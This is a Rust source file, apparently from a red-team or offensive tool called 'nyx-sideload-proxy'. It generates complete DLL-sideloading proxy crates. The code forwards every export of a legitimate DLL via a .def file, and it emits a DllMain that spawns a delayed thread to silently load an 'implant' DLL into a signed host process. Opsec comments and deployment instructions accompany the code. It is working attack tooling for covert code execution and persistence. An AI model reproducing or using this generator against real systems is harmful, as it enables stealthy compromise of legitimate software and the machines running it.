//! Proxy-DLL crate skeleton generation.
//!
//! ## Forwarding mechanism (decision: GNU ld `.def` forwarders)
//!
//! Under `x86_64-pc-windows-gnu` the practical options were:
//!
//! 1. **`.def` file with `name = realdll.name @ordinal` forwarder entries**
//!    (chosen). GNU ld's def parser (binutils `deffilep`) emits real
//!    forwarder RVAs, so the Windows loader resolves `proxy.Func →
//!    realdll.Func` itself. Zero code per export, zero runtime resolution,
//!    and ordinal-only exports work via `"_ord_N" = "realdll.#N" @N NONAME`.
//!    Verified locally against mingw-w64 14 (objdump shows
//!    `Forwarder RVA -- realdll.Func`). Caveats found empirically:
//!    - the `LIBRARY` name must be quoted (`LIBRARY "proxy.dll"`), unquoted
//!      dotted names are a syntax error in GNU ld's parser;
//!    - `#N` ordinal forwarders must be quoted (`"realdll.#5"`).
//! 2. `#[no_mangle]` thunk stubs that `GetProcAddress` + tail-call — needs a
//!    naked trampoline per export because signatures are unknown; fragile.
//! 3. `#[link]` / `-C link-arg=/EXPORT:...` — MSVC-style, not supported by
//!    the GNU toolchain.
//!
//! The def file is passed to the linker via `cargo:rustc-link-arg` from the
//! generated crate's `build.rs` (supported for cdylib targets).
//!
//! Known cosmetic deviation: the proxy exports `DllMain` in addition to the
//! original exports (rustc marks `#[no_mangle]` symbols dllexport on
//! windows-gnu and there is no clean way to suppress it). One extra export
//! vs. the original — flagged as a static IOC in
//! `docs/design/SIDELOADING_DELIVERY.md`.

use crate::pe_exports::ExportTable;
use std::fmt::Write as _;
use std::fs;
use std::io;
use std::path::Path;

/// Everything the generator needs to know, resolved by the CLI layer.
pub struct ProxySpec {
    /// File name the proxy DLL must have (= the original DLL's file name).
    pub proxy_dll_name: String,
    /// Name the *original* DLL is deployed under (forwarding target), e.g.
    /// `version_orig.dll`.
    pub real_dll_name: String,
    /// File name of the implant DLL the proxy loads, e.g. `nyx_implant_win.dll`.
    pub implant_dll_name: String,
    /// Delay in ms before the implant thread loads the implant DLL.
    pub delay_ms: u32,
}

/// Render the `.def` file: one forwarder entry per original export.
pub fn render_def(table: &ExportTable, spec: &ProxySpec) -> String {
    let mut out = String::new();
    // Quoted LIBRARY name: GNU ld's def parser rejects unquoted dotted names.
    let _ = writeln!(out, "LIBRARY \"{}\"", spec.proxy_dll_name);
    let _ = writeln!(out, "EXPORTS");
    let real_stem = spec
        .real_dll_name
        .strip_suffix(".dll")
        .unwrap_or(&spec.real_dll_name);
    for sym in &table.symbols {
        match &sym.name {
            Some(name) => {
                let _ = writeln!(
                    out,
                    "  \"{name}\" = \"{real_stem}.{name}\" @{}",
                    sym.ordinal
                );
            }
            None => {
                // Ordinal-only export: NONAME entry forwarding to `real.#N`.
                let _ = writeln!(
                    out,
                    "  \"_ord_{o}\" = \"{real_stem}.#{o}\" @{o} NONAME",
                    o = sym.ordinal
                );
            }
        }
    }
    out
}

/// Render `Cargo.toml` for the generated proxy crate.
pub fn render_cargo_toml(spec: &ProxySpec) -> String {
    let lib_name = sanitize_ident(spec.proxy_dll_name.trim_end_matches(".dll"));
    format!(
        r#"[package]
name = "{lib_name}-proxy"
version = "0.1.0"
edition = "2021"
publish = false

# Generated by nyx-sideload-proxy. Standalone crate — do NOT add to a workspace.
# Build (from macOS/Linux with mingw-w64 installed):
#   cargo build --release --target x86_64-pc-windows-gnu
# Output: target/x86_64-pc-windows-gnu/release/{lib_name}.dll
#   → rename/deploy as {proxy} next to the host executable,
#     with the original DLL present as {real}.
[workspace]

[lib]
crate-type = ["cdylib"]
name = "{lib_name}"

[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
strip = true
panic = "abort"
"#,
        proxy = spec.proxy_dll_name,
        real = spec.real_dll_name,
    )
}

/// Render `build.rs` — feeds `exports.def` to the GNU linker.
pub fn render_build_rs() -> &'static str {
    r#"fn main() {
    // `cargo:rustc-link-arg` from a build script applies to cdylib crates.
    // GNU ld accepts a .def file as a plain input; the forwarder entries in
    // exports.def become real PE forwarder RVAs.
    let def = std::path::Path::new(env!("CARGO_MANIFEST_DIR")).join("exports.def");
    println!("cargo:rustc-link-arg={}", def.display());
    println!("cargo:rerun-if-changed=exports.def");
}
"#
}

/// Render `src/lib.rs` — the DllMain skeleton that loads the implant.
pub fn render_lib_rs(spec: &ProxySpec) -> String {
    format!(
        r#"//! Proxy DLL for `{proxy}` — generated by nyx-sideload-proxy.
//!
//! All original exports are forwarded by the LINKER (see exports.def): the
//! host's calls to `{proxy}` go straight to `{real}` and never execute any
//! code in this file. `DllMain` below is therefore the ONLY code of ours that
//! runs — the implant trigger has to live here (or be chained from it).
//!
//! Opsec notes (review before real delivery):
//! - DllMain runs under loader lock: no LoadLibrary, no WinHTTP, no heavy
//!   work in-line. We only spawn a thread; the thread body runs after the
//!   lock is released. (Verified mechanism; the thread start itself is
//!   documented by MS as safe, everything else is deferred there.)
//! - The conservative default below sleeps IMPLANT_DELAY_MS, then loads the
//!   implant from this DLL's own directory. A stealthier delivery would
//!   trigger on a specific exported call instead — but linker forwarding
//!   means we never see those calls, so DllMain+thread is the only hook
//!   without switching to thunk stubs. Trade-off documented in
//!   docs/design/SIDELOADING_DELIVERY.md.

use std::ffi::c_void;

type Hinstance = *mut c_void;

const DLL_PROCESS_ATTACH: u32 = 1;
const IMPLANT_DELAY_MS: u32 = {delay};
/// Implant DLL file name, loaded from this proxy's own directory.
const IMPLANT_NAME: &str = "{implant}";
const MAX_PATH_WIDE: usize = 32768;

extern "system" {{
    fn LoadLibraryW(name: *const u16) -> *mut c_void;
    fn GetModuleFileNameW(module: Hinstance, buf: *mut u16, size: u32) -> u32;
    fn CreateThread(
        attrs: *mut c_void,
        stack: usize,
        start: extern "system" fn(*mut c_void) -> u32,
        param: *mut c_void,
        flags: u32,
        tid: *mut u32,
    ) -> *mut c_void;
    fn CloseHandle(handle: *mut c_void) -> i32;
    fn Sleep(ms: u32);
}}

#[no_mangle]
pub extern "system" fn DllMain(
    module: Hinstance,
    reason: u32,
    _reserved: *mut c_void,
) -> i32 {{
    if reason == DLL_PROCESS_ATTACH {{
        unsafe {{
            // Loader lock is held: spawn-and-return only. The new thread does
            // not start executing until the loader releases the lock.
            let t = CreateThread(
                std::ptr::null_mut(),
                0,
                implant_thread,
                module,
                0,
                std::ptr::null_mut(),
            );
            if !t.is_null() {{
                CloseHandle(t);
            }}
        }}
    }}
    1
}}

/// Runs AFTER loader lock is released. Loads the implant DLL located next to
/// this proxy. Failure is silent — a sideloaded proxy must not break the host
/// application when the implant is missing.
extern "system" fn implant_thread(module: *mut c_void) -> u32 {{
    unsafe {{
        Sleep(IMPLANT_DELAY_MS);

        // Own module path → directory → `<dir>\{implant}`.
        let mut buf = [0u16; MAX_PATH_WIDE];
        let n = GetModuleFileNameW(module, buf.as_mut_ptr(), buf.len() as u32);
        if n == 0 || n as usize >= buf.len() {{
            return 1;
        }}
        let mut path: Vec<u16> = buf[..n as usize].to_vec();
        match path.iter().rposition(|&c| c == b'\\' as u16) {{
            Some(sep) => path.truncate(sep + 1),
            None => return 1,
        }}
        path.extend(IMPLANT_NAME.encode_utf16());
        path.push(0);

        let h = LoadLibraryW(path.as_ptr());
        if h.is_null() {{
            return 1;
        }}
        // The implant's own DllMain has now run. Keep the handle (and the
        // implant) loaded for the lifetime of the host process.
        0
    }}
}}
"#,
        proxy = spec.proxy_dll_name,
        real = spec.real_dll_name,
        delay = spec.delay_ms,
        implant = spec.implant_dll_name,
    )
}

/// Render a short README for the generated crate.
pub fn render_readme(spec: &ProxySpec, table: &ExportTable) -> String {
    let named = table.symbols.iter().filter(|s| s.name.is_some()).count();
    let ord_only = table.symbols.len() - named;
    let fwd = table
        .symbols
        .iter()
        .filter(|s| s.forwarder.is_some())
        .count();
    format!(
        r#"# Proxy DLL for `{proxy}`

Generated by `nyx-sideload-proxy`. {total} exports forwarded ({named} named,
{ord_only} ordinal-only, {fwd} of the originals were themselves forwarders).

## Build

```sh
cargo build --release --target x86_64-pc-windows-gnu
# → target/x86_64-pc-windows-gnu/release/{stem}.dll
```

## Deploy

```text
<host-dir>\
  <host.exe>            (signed, imports {proxy} statically)
  {proxy}    ← this build, renamed if needed
  {real}  ← the ORIGINAL dll, renamed
  {implant}  ← the implant
```

See `docs/design/SIDELOADING_DELIVERY.md` for host selection, opsec and
detection-surface notes.
"#,
        proxy = spec.proxy_dll_name,
        total = table.symbols.len(),
        named = named,
        ord_only = ord_only,
        fwd = fwd,
        stem = sanitize_ident(spec.proxy_dll_name.trim_end_matches(".dll")),
        real = spec.real_dll_name,
        implant = spec.implant_dll_name,
    )
}

/// Write the full crate skeleton into `out_dir`.
pub fn generate(out_dir: &Path, table: &ExportTable, spec: &ProxySpec) -> io::Result<()> {
    fs::create_dir_all(out_dir.join("src"))?;
    fs::write(out_dir.join("Cargo.toml"), render_cargo_toml(spec))?;
    fs::write(out_dir.join("build.rs"), render_build_rs())?;
    fs::write(out_dir.join("src").join("lib.rs"), render_lib_rs(spec))?;
    fs::write(out_dir.join("exports.def"), render_def(table, spec))?;
    fs::write(out_dir.join("README.md"), render_readme(spec, table))?;
    Ok(())
}

/// Cargo package/lib names must be identifier-ish; original DLL stems can
/// contain anything (e.g. `api-ms-win-...`). Replace offending chars.
fn sanitize_ident(stem: &str) -> String {
    stem.chars()
        .map(|c| {
            if c.is_ascii_alphanumeric() || c == '_' {
                c
            } else {
                '_'
            }
        })
        .collect()
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::pe_exports::ExportedSymbol;

    fn fixture_table() -> ExportTable {
        ExportTable {
            dll_name: Some("orig.dll".into()),
            symbols: vec![
                ExportedSymbol {
                    name: Some("FuncA".into()),
                    ordinal: 1,
                    forwarder: None,
                },
                ExportedSymbol {
                    name: Some("SleepFwd".into()),
                    ordinal: 2,
                    forwarder: Some("KERNEL32.Sleep".into()),
                },
                ExportedSymbol {
                    name: None,
                    ordinal: 4,
                    forwarder: None,
                },
            ],
        }
    }

    fn fixture_spec() -> ProxySpec {
        ProxySpec {
            proxy_dll_name: "orig.dll".into(),
            real_dll_name: "orig_orig.dll".into(),
            implant_dll_name: "nyx_implant_win.dll".into(),
            delay_ms: 3000,
        }
    }

    #[test]
    fn def_forwards_every_export() {
        let def = render_def(&fixture_table(), &fixture_spec());
        let expected = concat!(
            "LIBRARY \"orig.dll\"\n",
            "EXPORTS\n",
            "  \"FuncA\" = \"orig_orig.FuncA\" @1\n",
            "  \"SleepFwd\" = \"orig_orig.SleepFwd\" @2\n",
            "  \"_ord_4\" = \"orig_orig.#4\" @4 NONAME\n",
        );
        assert_eq!(def, expected);
    }

    #[test]
    fn lib_rs_mentions_implant_and_delay() {
        let lib = render_lib_rs(&fixture_spec());
        assert!(lib.contains("IMPLANT_DELAY_MS: u32 = 3000"));
        assert!(lib.contains("IMPLANT_NAME: &str = \"nyx_implant_win.dll\""));
        assert!(lib.contains("pub extern \"system\" fn DllMain"));
    }

    #[test]
    fn generate_writes_full_skeleton() {
        let dir = std::env::temp_dir().join(format!(
            "nyx-sideload-proxy-test-{}",
            std::process::id()
        ));
        let _ = fs::remove_dir_all(&dir);
        generate(&dir, &fixture_table(), &fixture_spec()).unwrap();
        for f in ["Cargo.toml", "build.rs", "exports.def", "README.md"] {
            assert!(dir.join(f).is_file(), "missing {f}");
        }
        assert!(dir.join("src/lib.rs").is_file());
        let def = fs::read_to_string(dir.join("exports.def")).unwrap();
        assert_eq!(def.matches('@').count(), 3); // one @ordinal per export
        let _ = fs::remove_dir_all(&dir);
    }
}
